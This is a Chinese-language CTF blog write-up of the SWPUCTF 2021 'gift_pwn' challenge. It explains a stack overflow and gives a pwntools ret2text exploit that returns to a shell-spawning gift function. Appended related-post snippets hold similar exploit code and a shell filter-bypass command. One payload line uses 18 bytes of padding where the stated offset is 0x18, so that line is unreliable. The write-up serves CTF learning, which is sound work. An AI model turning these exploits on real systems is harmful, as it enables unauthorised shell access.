nssctf [SWPUCTF 2021 新生赛]gift_pwn

最新推荐文章于 2024-05-30 22:30:23 发布
最新推荐文章于 2024-05-30 22:30:23 发布
阅读量854 收藏 3
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58624515/article/details/129410022
版权

从nssctf下载下来附件

使用checksec查看保护机制的开启

是一个amd64的程序

开启了栈不可执行保护和部分开启堆栈随机化,got表可写

进入main函数

发现vuln的函数

进入函数

发现声明了一个buf的字符串变量,离rbp的距离是0x10

返回的时候,read函数写入,最大值是0x64

这题是一个栈溢出

我们点了点发现在gift函数里面有可以执行/bin/sh的函数

我们查看他的返回地址

0x00000000004005B6

根据这题的代码分析

 

写入gift的地址

函数返回的时候会自动跳转到gift函数的位置

gift的函数里面

返回了一个交互式的/bin/sh

所以我们的payload就是

payload = b"A"*18 + p64(0x00000000004005B6) //0x00000000004005B6是gift的地址

所以我们的exp就是

from pwn import *
io = remote(ip,port)
elf = ELF("./one")
payload = cyclic(0x10+8) + p64(elf.sym["gift"])
io.sendline(payload)
io.interactive()

cyclic(0x10+8) 自动生成0x10+8个字节的垃圾数据,elf.sym["gift"],寻找gift函数在./one程序里面的地址

Ni_ght
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SWPUCTF 2021 新生 gift_pwn
2301_79793667的博客
12-03 184
发现连接之后并没有什么反应,我们需要用ida进行查看。发现是64位的程序,那我们就用64位ida打开。/bin/sh开始的位置是4005B6。然后先进行nc连接,看看情况。有/bin/sh,追上去看看。然后运行,并查看flag。我们检查附件的保护方式。打开环境,并下载附件。定义了buf[16]
[SWPUCTF 2021 新生]gift_F12
2302_78608190的博客
03-09 438
点击题目F12进入源代码,然后在ctrl+f查找字符串flag。
NSSCTF刷题笔记pwn1——[SWPUCTF 2021 新生]gift_pwn
qq_45692883的博客
01-19 583
最后加上我们的返回地址,是上面找到的gift的地址,payload就完成了。ida有帮我们识别出来,距离rbp 16字节,我们要再加上我们的8个字节。首先找到我们要返回的gift的地址 0x4005b6。有一个栈溢出,和一个调用系统bash的命令。_system可以调用系统命令。把附件下载下来拖入ida运行。vuln可能存在漏洞的函数。不过要注意这是64位的程序。直接发送获取shell即可。gift题目中的主要函数。
[SWPUCTF 2021 新生]gift_pwn
m0_74355719的博客
11-29 424
【代码】[SWPUCTF 2021 新生]gift_pwn
CTF-1 cat’s gift
weixin_43607515的博客
05-25 747
题目: [cat’s gift]时间: 2023-05-23难度: 2题目来源: CATCTF题目网站: 攻防世界。
SWPU新生2021 Pwn部分WriteUp
mumuzi的博客
10-11 1944
第一波放题 nc签到 不能有’cat’,‘ls’,’ ‘,‘cd’,‘echo’,’<’,’${IFS}’ 这很web 直接绕就行 tac$IFS$1flag gift_pwn ret2text from pwn import * p = remote('1.14.71.254','28057') p.sendline('a'*(0x10+8)+p64(0x4005b6)) p.interactive() whitegive_pwn ret2libc3 from pwn import * p =
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
赣网杯2021_pwn2.rar
12-11
赣网杯2021 pwn1 bin ctf
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
ARM7下PWN接口的使用源码,包含C语言及汇编
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
NSSCTF-SWPUCTF 2021 新生-web-wp
F1rstb100d
09-19 668
NSSCTF-SWPUCTF 2021 新生-web-wp
i春秋 “百度杯”CTF 十月场 Gift
include_heqile的博客
10-24 2469
https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;amp;amp;r=0 进入题目链接,是一张黑人问号图片: 直接使用burp suite抓包送到Repeater模块,检查发送和相应报文的HTTP头部字段,并未发现可疑字段,图片是base64编码,点击href链接,依然还是刚的页面,尝试更改请求方法,将GET更改为POST,响应如下: 如果了解过Django的话应该很容易看...
NSSCTF Pwn Page 1 - 2
红叶的博客
03-14 1565
NSSCTF Pwn 第一页到第二页全部题目解析。 刷了大概一个月的NSSCTF,对Pwn的理解更高了,虽然也没高到哪去。
[SWPUCTF 2021 新生]gift_F12的WP
yeah123_的博客
12-18 361
签到题,打开F12即可获得。
NSSCTF—wp
XikX_eleven的博客
09-21 1218
NSSctf wpPrize Problem2 Prize Problem2 根基提示url加/1.zip,下载压缩包 下载速度很慢 做了限制 idm 多线程下载 拉满32
linux系统安全及应用
最新发布
Alone8046的博客
05-30 471
一、新的服务器到手该如何部署:1.配置IP地址,网关,dns解析,内外网。3.磁盘分区:lvm及raid。二、应用:1.不需要或者不想登录的用户设置为nologin:usermod -s nologin +用户。解锁文件:chattr -i /etc/passwd。提供了一种标准的身份认证的接口(对账号权限进行控制),可以允许管理员定制化配置各种认证方式和方法。(配置的时候一定要注意:有限放开原则,用什么给什么,不需要的不加)会话管理模块:管理用户的会话,记录会话信息,注销用户的会话,远程终端连接。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 1022
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
xdctf2015_pwn200
09-03
xdctf2015_pwn200是一道CTF中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过计算偏移量得到libc的基址,进而计算出system函数和/bin/sh字符串的地址。最后,通过构造ROP链来调用system函数,并将/bin/sh字符串作为参数传入,从而获取shell权限。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [[BUUCTF]PWN——xdctf2015_pwn200](https://blog.csdn.net/mcmuyanga/article/details/109622553)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [xdctf2015_pwn200](https://blog.csdn.net/weixin_44309300/article/details/130628776)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值